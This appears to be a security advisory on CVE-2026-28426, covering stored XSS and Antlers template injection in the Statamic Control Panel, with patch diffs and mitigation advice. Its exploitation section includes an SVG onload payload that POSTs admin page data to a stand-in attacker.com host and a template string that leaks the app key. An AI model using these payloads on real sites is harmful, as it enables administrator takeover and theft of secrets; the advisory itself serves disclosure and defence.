Chain Reaction: Stored XSS and Antlers Template Injection in Statamic Control Panel

Statamic is a modern, flat-file CMS built on the Laravel framework, widely used for its flexibility in handling content through Git workflows. CVE-2026-28426 represents a composite vulnerability within the Statamic Control Panel (CP) that manifests through multiple vectors: unsafe rendering of SVG images, insecure embedding of PDF files, and context leakage within the Antlers template engine. The vulnerability is classified as Stored Cross-Site Scripting (XSS), specifically targeting the administrative interface where privileged actions occur.

The core issue lies in the trust boundary between content creators (Authors/Editors) and system administrators. The CMS failed to adequately sanitize specific file types and text inputs before rendering them in the DOM of the Control Panel. Consequently, an attacker with permission to create entries or upload assets can embed executable scripts. When an administrator navigates to the affected entry or asset library, the browser executes the injected code within the administrator's session context.

This vulnerability is particularly severe because it bridges the gap between content management and system administration. A successful exploit does not merely deface a public page; it compromises the administrative session. This allows attackers to perform actions on behalf of the administrator, such as creating new admin accounts, modifying system configurations, or exfiltrating sensitive tokens like the CSRF token or API keys.

The vulnerability stems from three distinct but related root causes involving data sanitization and context isolation. First, the handling of Scalable Vector Graphics (SVGs) was insufficiently restrictive. SVGs are XML-based formats that support the embedding of JavaScript via <script> tags or event handlers like onload. Statamic's asset manager rendered these files inline or within contexts that allowed the browser to parse and execute the embedded scripts, treating user-uploaded SVGs as trusted DOM elements rather than inert images.

Second, the Antlers template engine, which powers Statamic's frontend and parts of the CP, lacked strict strictures on variable evaluation in user-content contexts. The engine allowed the evaluation of user-supplied strings (e.g., in entry titles) as template code. This created a Server-Side Template Injection (SSTI) variant where attackers could invoke PHP methods or access the global configuration object (config()->all()). This exposed critical application secrets, such as the APP_KEY and database credentials, directly to the rendered output.

Third, the use of legacy PDF embedding techniques contributed to the attack surface. The CMS utilized pdfobject and standard browser embedding to display PDF previews. Modern browsers often execute JavaScript contained within PDF files when rendered in standard frames. By failing to rasterize or sandbox these previews, Statamic allowed the execution of active content within PDFs, providing another vector for XSS execution when an administrator previewed a malicious document.

The remediation involved significant refactoring across multiple components. A primary focus was the Antlers engine's access to configuration data. Previously, the engine could access the entire configuration array, leaking secrets. The patch introduced a Cascade::config() method that implements a strict allowlist, ensuring only safe configuration values (like app.name) are exposed to the template context.

Vulnerable Configuration Access (Conceptual):

// Pre-patch: direct access to all config values
public function index()
{
    // Returns everything, including APP_KEY and DB_PASSWORD
    return config()->all();
}

Patched Configuration Access (Commit 01ca0847):

// Post-patch: Whitelisted access via Cascade
public function config()
{
    // Only returns values explicitly defined in the allowlist
    return Cascade::config();
}

Furthermore, the handling of SVG rendering was hardened. The patch integrates rhukster/dom-sanitizer to strip dangerous tags and attributes before the SVG is injected into the DOM. Additionally, the Vue.js components responsible for rendering field labels and hints were updated to use v-text (which escapes HTML entities) instead of v-html (which renders raw HTML), neutralizing text-based injection vectors.

Vue.js Component Hardening (Commit 93c657ed):

<!-- Vulnerable Component -->
<div class="field-hint" v-html="field.hint"></div>
 
<!-- Patched Component -->
<!-- v-text treats the content as a string, preventing script execution -->
<div class="field-hint" v-text="field.hint"></div>

To exploit this vulnerability, an attacker requires an authenticated account with permissions to create content or upload assets (e.g., an 'Author' role). The exploitation path begins with the preparation of a malicious payload. For the SVG vector, the attacker crafts an .svg file containing an XSS payload. A simple payload might use the onload event of the root <svg> element to trigger a fetch request that exfiltrates the administrator's CSRF token.

Example SVG Payload:

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('/cp/users').then(r=>r.text()).then(d=>fetch('https://attacker.com/log',{method:'POST',body:d}))">
  <text>Malicious Icon</text>
</svg>

The attacker uploads this file to the Asset Library. The vulnerability triggers when an administrator views the Asset Library or edits an entry that references this asset. The browser parses the SVG, executes the onload handler, and performs the malicious action in the background without the administrator's knowledge. Because the script runs in the context of the Control Panel, it bypasses Same-Origin Policy (SOP) protections regarding the application's internal API.

Alternatively, for the Antlers injection vector, the attacker inserts a template string into a text field, such as an entry title: {{ config:app:key }}. If the Control Panel renders this title using the vulnerable Antlers evaluation logic, the application key is displayed or rendered in the HTML source, allowing the attacker to compromise the application's encryption and signing mechanisms.

The impact of CVE-2026-28426 is classified as High (CVSS 8.7), primarily due to the loss of Confidentiality and Integrity affecting the administrative domain. While the vulnerability requires low-privileged authentication to seed the exploit, the victim is a high-privileged user. Successful exploitation results in Full Account Takeover (ATO) of the administrator.

Once an attacker gains administrative access via session hijacking or creating a backdoor account, they achieve effective Remote Code Execution (RCE) capability. In many CMS environments, administrators can edit template files, install plugins, or modify system configurations that allow for the execution of arbitrary PHP code. Therefore, this XSS acts as a gateway to full server compromise.

The vulnerability also facilitates data exfiltration. The Antlers template injection specifically allows for the leakage of environment variables and configuration secrets. Exposure of the APP_KEY allows attackers to forge session cookies, while exposure of database credentials (if stored in config logic) could lead to direct database access if external connections are permitted.

The primary and most effective remediation is to upgrade Statamic to version 5.73.11 or 6.4.0 immediately. These versions introduce comprehensive fixes, including SVG sanitization, Antlers engine sandboxing, and the replacement of the PDF viewer with a Canvas-based renderer (using pdfjs-dist) that prevents script execution.

If immediate patching is not feasible, administrators should restrict file upload permissions. Specifically, blocking the upload of .svg and .pdf files via the Control Panel configuration can mitigate the file-based vectors. However, this does not address the Antlers template injection vector in text fields. Therefore, relying solely on configuration changes is discouraged.

Security teams should also implement a strict Content Security Policy (CSP). A robust CSP can mitigate the impact of XSS by restricting the sources from which scripts can be loaded and preventing the execution of inline scripts. While a CSP cannot prevent the initial injection, it can block the exfiltration of data to external domains and prevent the execution of unauthorized JavaScript payloads.